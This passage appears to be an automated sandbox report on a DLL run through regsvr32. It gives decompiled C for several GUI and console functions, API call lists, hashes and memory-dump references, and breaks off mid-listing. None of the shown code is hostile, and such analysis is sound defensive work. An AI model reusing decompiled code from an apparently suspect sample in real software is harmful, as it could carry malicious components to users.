                                                                              0x1001aac7
                                                                              0x1001ab77
                                                                              0x1001ab77
                                                                              0x1001ab7a
                                                                              0x1001ab7c
                                                                              0x1001ab84
                                                                              0x1001ab84
                                                                              0x1001ab90
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001aacd
                                                                              0x1001aacd
                                                                              0x1001aad1
                                                                              0x1001aad3
                                                                              0x1001aad7
                                                                              0x1001aadb
                                                                              0x1001aae0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001aae2
                                                                              0x1001aaea
                                                                              0x1001ab75
                                                                              0x1001ab75
                                                                              0x1001ab75
                                                                              0x00000000
                                                                              0x1001ab75
                                                                              0x1001aaf4
                                                                              0x1001aaf7
                                                                              0x1001ab01
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001ab03
                                                                              0x1001ab0f
                                                                              0x1001ab18
                                                                              0x1001ab1e
                                                                              0x1001ab26
                                                                              0x1001ab2a
                                                                              0x1001ab2d
                                                                              0x1001ab31
                                                                              0x1001ab3d
                                                                              0x1001ab71
                                                                              0x00000000
                                                                              0x1001ab71
                                                                              0x1001ab60
                                                                              0x1001ab60
                                                                              0x1001ab64
                                                                              0x1001ab6a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001ab41
                                                                              0x1001ab43
                                                                              0x1001ab49
                                                                              0x1001ab4a
                                                                              0x1001ab52
                                                                              0x1001ab55
                                                                              0x1001ab57
                                                                              0x1001ab59
                                                                              0x1001ab59
                                                                              0x1001ab59
                                                                              0x1001ab59
                                                                              0x00000000
                                                                              0x1001ab57
                                                                              0x1001aacd

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$ExtentMessageMetricsPoint32SendSystemText
                                                                              • String ID:
                                                                              • API String ID: 479123726-0
                                                                              • Opcode ID: cbd482bc5e9ce7c57ee30692580d852455945b78927667f88766aa7364f4baea
                                                                              • Instruction ID: 400f910ff9d43ae80ee211becf5d5004878e844bfb6294c8df880487973a6874
                                                                              • Opcode Fuzzy Hash: cbd482bc5e9ce7c57ee30692580d852455945b78927667f88766aa7364f4baea
                                                                              • Instruction Fuzzy Hash: C231C477315A8086DB55CF26E840B9A7692FB8ABE8F058125AD4A4B759DF38C4C5C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002BE4C Relevance: 7.6, APIs: 5, Instructions: 99keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 10016020: GetWindowLongW.USER32 ref: 10016037
                                                                              • GetWindowRect.USER32 ref: 1002BE72
                                                                              • GetSystemMetrics.USER32 ref: 1002BE7D
                                                                              • GetSystemMetrics.USER32 ref: 1002BE8B
                                                                              • GetKeyState.USER32 ref: 1002BEB6
                                                                              • InflateRect.USER32 ref: 1002BEF7
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsRectSystemWindow$InflateLongState
                                                                              • String ID:
                                                                              • API String ID: 2406722796-0
                                                                              • Opcode ID: df98072b830f3966ede54f9f979122b746e7660167c9beb08a478d7ca4189142
                                                                              • Instruction ID: e5a0da1ef3d27f040d5c87d82035c98a2b7728c2c16fb8a2fbcb607a1e12e898
                                                                              • Opcode Fuzzy Hash: df98072b830f3966ede54f9f979122b746e7660167c9beb08a478d7ca4189142
                                                                              • Instruction Fuzzy Hash: 8631C236704A458BEF65CB25FA043AAB291F38CB94F814431EE5A07B54EA7CD881CF00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002CDF0 Relevance: 7.6, APIs: 5, Instructions: 77windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E1002CDF0(long long __ecx, void* __rax, void* __rcx, void* __r8) {
				intOrPtr _v20;
				long long _v40;
				intOrPtr _v48;
				void* _v56;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t37;
				long long _t38;
				void* _t40;
				void* _t41;
				void* _t50;
				void* _t51;
				void* _t61;
				void* _t62;
				intOrPtr _t64;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;

				_t65 = __r8;
				_t50 = __rax;
				_t38 = __ecx;
				_t51 = __rcx;
				GetCapture();
				if(__rax != 0) {
					L25:
					__eflags = 0;
					return 0;
				} else {
					SetCapture();
					E10011808(_t37, _t39, __rax, __rax, _t64, __r8, _t66, _t67);
					while(1) {
						GetCapture();
						E10011808(_t37, _t39, _t50, _t50, _t64, _t65, _t66, _t67);
						if(_t50 !=  *((intOrPtr*)(_t51 + 0x70))) {
							break;
						}
						r9d = 0;
						r8d = 0;
						_t39 = 0;
						if(GetMessageW(??, ??, ??, ??) == 0) {
							_t38 = _v40;
							E10024D14();
							break;
						}
						_t25 = _v48 - 0x100;
						if(_t25 == 0) {
							__eflags =  *((intOrPtr*)(_t51 + 0xa0));
							if( *((intOrPtr*)(_t51 + 0xa0)) != 0) {
								_t39 = _v40;
								r8d = 1;
								E1002CA04(_v40, _t51);
							}
							__eflags = _v40 - 0x1b;
							if(__eflags == 0) {
								break;
							} else {
								continue;
							}
						}
						_t27 = _t25 - 1;
						if(_t27 == 0) {
							__eflags =  *((intOrPtr*)(_t51 + 0xa0));
							if(__eflags != 0) {
								_t39 = _v40;
								r8d = 0;
								E1002CA04(_v40, _t51);
							}
							continue;
						}
						_t29 = _t27 - 0xff;
						if(_t29 == 0) {
							__eflags =  *((intOrPtr*)(_t51 + 0xa0));
							_t64 = _v20;
							_t61 = _t51;
							if( *((intOrPtr*)(_t51 + 0xa0)) == 0) {
								E1002CA44(_t29, 0, _t61, _t64);
							} else {
								E1002C968(_t29, 0, _t40, _t61, _t64, _t65, _t66, _t67);
							}
							continue;
						}
						_t32 = _t29 - 2;
						if(_t32 == 0) {
							__eflags =  *((intOrPtr*)(_t51 + 0xa0));
							_t62 = _t51;
							if(__eflags == 0) {
								E1002CD98(_t37, _t38, 0, _t41, __eflags, _t50, _t62, _t64, _t66, _t67, _t68, _t69);
							} else {
								E1002CC78(_t37, _t38, 0, _t41, __eflags, _t50, _t62, _t64, _t66, _t67, _t68, _t69);
							}
							return 1;
						}
						if(_t32 == 2) {
							break;
						}
						DispatchMessageW();
					}
					E1002CC18(_t38, __eflags, _t50, _t51, _t64, _t67);
					goto L25;
				}
			}
























                                                                              0x1002cdf0
                                                                              0x1002cdf0
                                                                              0x1002cdf0
                                                                              0x1002cdf6
                                                                              0x1002cdf9
                                                                              0x1002ce02
                                                                              0x1002cf25
                                                                              0x1002cf25
                                                                              0x00000000
                                                                              0x1002ce08
                                                                              0x1002ce10
                                                                              0x1002ce19
                                                                              0x1002ce1e
                                                                              0x1002ce1e
                                                                              0x1002ce27
                                                                              0x1002ce30
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002ce3b
                                                                              0x1002ce3e
                                                                              0x1002ce41
                                                                              0x1002ce4b
                                                                              0x1002cf14
                                                                              0x1002cf18
                                                                              0x00000000
                                                                              0x1002cf18
                                                                              0x1002ce55
                                                                              0x1002ce5a
                                                                              0x1002cecd
                                                                              0x1002ced4
                                                                              0x1002ced6
                                                                              0x1002ceda
                                                                              0x1002cee3
                                                                              0x1002cee3
                                                                              0x1002cee8
                                                                              0x1002ceee
                                                                              0x00000000
                                                                              0x1002cef0
                                                                              0x00000000
                                                                              0x1002cef0
                                                                              0x1002ceee
                                                                              0x1002ce5c
                                                                              0x1002ce5f
                                                                              0x1002ceac
                                                                              0x1002ceb3
                                                                              0x1002ceb9
                                                                              0x1002cebd
                                                                              0x1002cec3
                                                                              0x1002cec3
                                                                              0x00000000
                                                                              0x1002ceb3
                                                                              0x1002ce61
                                                                              0x1002ce66
                                                                              0x1002ce87
                                                                              0x1002ce8e
                                                                              0x1002ce93
                                                                              0x1002ce96
                                                                              0x1002cea2
                                                                              0x1002ce98
                                                                              0x1002ce98
                                                                              0x1002ce98
                                                                              0x00000000
                                                                              0x1002ce96
                                                                              0x1002ce68
                                                                              0x1002ce6b
                                                                              0x1002cef5
                                                                              0x1002cefc
                                                                              0x1002ceff
                                                                              0x1002cf08
                                                                              0x1002cf01
                                                                              0x1002cf01
                                                                              0x1002cf01
                                                                              0x00000000
                                                                              0x1002cf0d
                                                                              0x1002ce74
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002ce7f
                                                                              0x1002ce7f
                                                                              0x1002cf20
                                                                              0x00000000
                                                                              0x1002cf20

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Capture$Message$Dispatch
                                                                              • String ID:
                                                                              • API String ID: 3654672037-0
                                                                              • Opcode ID: 0805a6b99118c44176a3c75992aac8ff13bcc3bd381acf44809663e3ba9b6a00
                                                                              • Instruction ID: e10e177cd7cb4a1dd2cb43fc37d1d85c3afe85321d64bbe987004b9827f654e7
                                                                              • Opcode Fuzzy Hash: 0805a6b99118c44176a3c75992aac8ff13bcc3bd381acf44809663e3ba9b6a00
                                                                              • Instruction Fuzzy Hash: 5F21B43671428C82DFA1DBB4F415FAE23A0EB85BC4FDA0131AD4A47A54CFB9C890CB11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001D8E0 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$DesktopLong
                                                                              • String ID:
                                                                              • API String ID: 2272707703-0
                                                                              • Opcode ID: 1bbf19455d1f73b547ef0b356a8bd450eb71be429497abf1aa1112499da7fb8e
                                                                              • Instruction ID: d94060c8b3c6fe8dc9038734a58d5cafd5164304a6c61bc4ba9be41ec0a37a7f
                                                                              • Opcode Fuzzy Hash: 1bbf19455d1f73b547ef0b356a8bd450eb71be429497abf1aa1112499da7fb8e
                                                                              • Instruction Fuzzy Hash: 3511E23170164582FB1AFB62AA597AE1692EBC9FC8F064036CE460FF45EF79C8C18301
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004CAD0 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WriteConsoleW.KERNEL32 ref: 1004CB2C
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,10048E39), ref: 1004CB47
                                                                                • Part of subcall function 10050C50: CreateFileA.KERNEL32 ref: 10050C7A
                                                                              • GetConsoleOutputCP.KERNEL32 ref: 1004CB5C
                                                                              • WideCharToMultiByte.KERNEL32 ref: 1004CB8D
                                                                              • WriteConsoleA.KERNEL32 ref: 1004CBB2
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                              • String ID:
                                                                              • API String ID: 1850339568-0
                                                                              • Opcode ID: 8eb8fd10ed6211ceef350533835c6ca9d089229e676f04f0d44cbf8b68281a0d
                                                                              • Instruction ID: ee4efce75b840e46d6b39520cc42e1eb91c4b8e4f1b9055575abd8420d71bbb1
                                                                              • Opcode Fuzzy Hash: 8eb8fd10ed6211ceef350533835c6ca9d089229e676f04f0d44cbf8b68281a0d
                                                                              • Instruction Fuzzy Hash: A7214C35204A4982E751CF20F85179A73A0F789BB8F610325E6FA86AE4DFBCC585CB44
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001CFD8 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 41%
                                                                              			E1001CFD8(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __rax, void* __rcx, void* __rdx, void* __r11) {
				struct HWND__* _t13;
				signed int _t16;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t42;
				void* _t43;
				void* _t44;

				_t44 = __r11;
				_t41 = __rdx;
				_t31 = __rax;
				_t28 = __esi;
				_t21 = __ecx;
				_t20 = __ebx;
				_t29 = __edx;
				_t43 = __rcx;
				GetDesktopWindow();
				while(1) {
					_t13 = GetWindow();
					_t32 = _t31;
					if(_t31 == 0) {
						break;
					}
					E10011844(_t20, _t21, _t28, _t31, _t32, _t41, _t44);
					_t42 = _t31;
					if(_t31 != 0) {
						_t37 =  *((intOrPtr*)(_t43 + 0x40));
						if( *((intOrPtr*)(_t43 + 0x40)) != _t32) {
							_t41 = _t32;
							if(E1001CF14(_t37, _t32) != 0) {
								_t16 = GetWindowLongW();
								if(_t29 != 0) {
									if((_t16 & 0x18000000) == 0 && ( *(_t42 + 0x78) & 0x00000002) != 0 &&  *((long long*)(_t43 + 0x138)) == 0) {
										ShowWindow();
										 *(_t42 + 0x78) =  *(_t42 + 0x78) & 0xfffffffd;
									}
								} else {
									if((_t16 & 0x18000000) == 0x10000000) {
										ShowWindow();
										 *(_t42 + 0x78) =  *(_t42 + 0x78) | 0x00000002;
									}
								}
							}
						}
					}
				}
				return _t13;
			}














                                                                              0x1001cfd8
                                                                              0x1001cfd8
                                                                              0x1001cfd8
                                                                              0x1001cfd8
                                                                              0x1001cfd8
                                                                              0x1001cfd8
                                                                              0x1001cfe1
                                                                              0x1001cfe3
                                                                              0x1001cfe6
                                                                              0x1001d07e
                                                                              0x1001d07e
                                                                              0x1001d087
                                                                              0x1001d08a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001cffc
                                                                              0x1001d004
                                                                              0x1001d007
                                                                              0x1001d009
                                                                              0x1001d010
                                                                              0x1001d012
                                                                              0x1001d01c
                                                                              0x1001d026
                                                                              0x1001d02e
                                                                              0x1001d052
                                                                              0x1001d06c
                                                                              0x1001d072
                                                                              0x1001d072
                                                                              0x1001d030
                                                                              0x1001d03a
                                                                              0x1001d041
                                                                              0x1001d047
                                                                              0x1001d047
                                                                              0x1001d03a
                                                                              0x1001d02e
                                                                              0x1001d01c
                                                                              0x1001d010
                                                                              0x1001d07b
                                                                              0x1001d098

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$DesktopLongShow
                                                                              • String ID:
                                                                              • API String ID: 1948769292-0
                                                                              • Opcode ID: 3c9254a11c42853ede199dbca81299c2fa66ff5b6f82f79ed8637053a4279137
                                                                              • Instruction ID: 63ace38da195dbf6a8bbae43a8f937504d5a728e1674c750cc226031b6dbd9d0
                                                                              • Opcode Fuzzy Hash: 3c9254a11c42853ede199dbca81299c2fa66ff5b6f82f79ed8637053a4279137
                                                                              • Instruction Fuzzy Hash: 5411066230168542EA96FB26AD0435932C1DB8DBD1F5A8135CE874E3A4EF7CD8C2C300
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001E3D8 Relevance: 7.6, APIs: 5, Instructions: 56windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 29%
                                                                              			E1001E3D8(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r11) {
				signed int _v56;
				void* _v584;
				void* _t14;
				signed long long _t36;
				signed long long _t37;
				intOrPtr _t50;

				_t25 = __ecx;
				_t53 =  &_v584;
				_t36 =  *0x1006f4c8; // 0x6f13091946cb
				_t37 = _t36 ^  &_v584;
				_v56 = _t37;
				_t14 = E1000A57C(__ebx, __ecx, __edx, __esi, _t37, __r8, __r9, __r11);
				_t50 =  *((intOrPtr*)(_t37 + 8));
				if(_t50 != 0 && __ebx != 0 && _t14 != 0) {
					_t25 =  *(_t50 + 0x120) & 0x0000ffff;
					if(__ebx == ( *(_t50 + 0x120) & 0x0000ffff) && _t14 ==  *(_t50 + 0x122)) {
						r8d = 0x103;
						GlobalGetAtomNameW(??, ??, ??);
						GlobalAddAtomW(??);
						_t25 =  *(_t50 + 0x122) & 0x0000ffff;
						r8d = 0x103;
						GlobalGetAtomNameW(??, ??, ??);
						GlobalAddAtomW(??);
						r9d =  *(_t50 + 0x122) & 0x0000ffff;
						r9d = r9d << 0x10;
						SendMessageW(??, ??, ??, ??);
					}
				}
				return E10038D20(_t25, _v56 ^ _t53);
			}









                                                                              0x1001e3d8
                                                                              0x1001e3dd
                                                                              0x1001e3e4
                                                                              0x1001e3eb
                                                                              0x1001e3ee
                                                                              0x1001e3ff
                                                                              0x1001e404
                                                                              0x1001e40b
                                                                              0x1001e426
                                                                              0x1001e430
                                                                              0x1001e445
                                                                              0x1001e448
                                                                              0x1001e453
                                                                              0x1001e459
                                                                              0x1001e465
                                                                              0x1001e468
                                                                              0x1001e473
                                                                              0x1001e479
                                                                              0x1001e48c
                                                                              0x1001e49b
                                                                              0x1001e49b
                                                                              0x1001e430
                                                                              0x1001e4be

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AtomGlobal$Name$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 1515195355-0
                                                                              • Opcode ID: 711e1ba79d938d04ce923f173172d0139bb957e8383cf444fb2bf323883a1cd6
                                                                              • Instruction ID: 1982e429ba36ecfe021e6d82f49bf4ee089b352ac72449bffb50fce6acb9e32b
                                                                              • Opcode Fuzzy Hash: 711e1ba79d938d04ce923f173172d0139bb957e8383cf444fb2bf323883a1cd6
                                                                              • Instruction Fuzzy Hash: 69119A72310A9193EA259B25E8503ED63A1F78CBE5F810121DECA47752EF3CD9A5CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10018DE0 Relevance: 7.6, APIs: 5, Instructions: 56windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 37%
                                                                              			E10018DE0(void* __ebx, void* __eflags, void* __rax, intOrPtr* __rcx, void* __r8, void* __r9, void* __r11) {
				void* _v40;
				char _v48;
				char _v64;
				signed int _v76;
				char _v80;
				long long _v88;
				void* __rbx;
				void* _t46;
				intOrPtr* _t49;

				_t46 = __eflags;
				_v88 = 0xfffffffe;
				_t49 = __rcx;
				E1000CBA4(__ebx,  &_v48, __rcx, __r8, __r11);
				GetClientRect(??, ??);
				GetWindowRect(??, ??);
				E1000C7AC(_t46, _t49,  &_v80);
				r8d = _v76;
				r8d =  ~r8d;
				OffsetRect(??, ??, ??);
				E1000C198( &_v48,  &_v64);
				r8d = _v76;
				r8d =  ~r8d;
				OffsetRect(??, ??, ??);
				 *((intOrPtr*)( *_t49 + 0x290))();
				E1000C1F0( &_v48,  &_v80);
				r9d = 0;
				SendMessageW(??, ??, ??, ??);
				 *((intOrPtr*)( *_t49 + 0x298))();
				return E1000CC2C(r9d, _t49,  &_v48,  &_v48);
			}












                                                                              0x10018de0
                                                                              0x10018de6
                                                                              0x10018def
                                                                              0x10018dfa
                                                                              0x10018e09
                                                                              0x10018e18
                                                                              0x10018e26
                                                                              0x10018e2b
                                                                              0x10018e30
                                                                              0x10018e3e
                                                                              0x10018e4e
                                                                              0x10018e53
                                                                              0x10018e58
                                                                              0x10018e66
                                                                              0x10018e7c
                                                                              0x10018e8d
                                                                              0x10018e92
                                                                              0x10018ea2
                                                                              0x10018eb8
                                                                              0x10018ecf

                                                                              APIs
                                                                                • Part of subcall function 1000CBA4: GetWindowDC.USER32 ref: 1000CBEC
                                                                              • GetClientRect.USER32 ref: 10018E09
                                                                              • GetWindowRect.USER32 ref: 10018E18
                                                                                • Part of subcall function 1000C7AC: ScreenToClient.USER32 ref: 1000C7BE
                                                                                • Part of subcall function 1000C7AC: ScreenToClient.USER32 ref: 1000C7CC
                                                                              • OffsetRect.USER32 ref: 10018E3E
                                                                                • Part of subcall function 1000C198: ExcludeClipRect.GDI32 ref: 1000C1C2
                                                                                • Part of subcall function 1000C198: ExcludeClipRect.GDI32 ref: 1000C1E2
                                                                              • OffsetRect.USER32 ref: 10018E66
                                                                                • Part of subcall function 1000C1F0: IntersectClipRect.GDI32 ref: 1000C21A
                                                                                • Part of subcall function 1000C1F0: IntersectClipRect.GDI32 ref: 1000C23A
                                                                              • SendMessageW.USER32 ref: 10018EA2
                                                                                • Part of subcall function 1000CC2C: ReleaseDC.USER32 ref: 1000CC58
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Clip$Client$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                                                                              • String ID:
                                                                              • API String ID: 890540625-0
                                                                              • Opcode ID: ed7a97a31f88c850a393e5d2248e85a1ca27aa8997ae9e69b04edf490f59c487
                                                                              • Instruction ID: 643ab22fb52ea3f4f4fdf463da72eb5b18ffb912756ca42481715797aee7da2d
                                                                              • Opcode Fuzzy Hash: ed7a97a31f88c850a393e5d2248e85a1ca27aa8997ae9e69b04edf490f59c487
                                                                              • Instruction Fuzzy Hash: 7E214136208A4691DB20CF14E84168E7730F7C97E9F545212EA9E47A7CDF78C689CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001B658 Relevance: 7.6, APIs: 5, Instructions: 54windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$InvalidateRectWindow
                                                                              • String ID:
                                                                              • API String ID: 3225880595-0
                                                                              • Opcode ID: 9b6600ccd42e7652f154323abc3f3b359c6048b7b1c67f47c621338b5814d839
                                                                              • Instruction ID: d358d43d45af8fe42070c4fd114c6f63d7c00ba83e2bdacd8a3ffcfa976d1068
                                                                              • Opcode Fuzzy Hash: 9b6600ccd42e7652f154323abc3f3b359c6048b7b1c67f47c621338b5814d839
                                                                              • Instruction Fuzzy Hash: 5711BF7271066083F3658F2AF8507AAB3A1E3C8B86F418021EFC687A44CF3CD895CB00
                                                                              Uniqueness

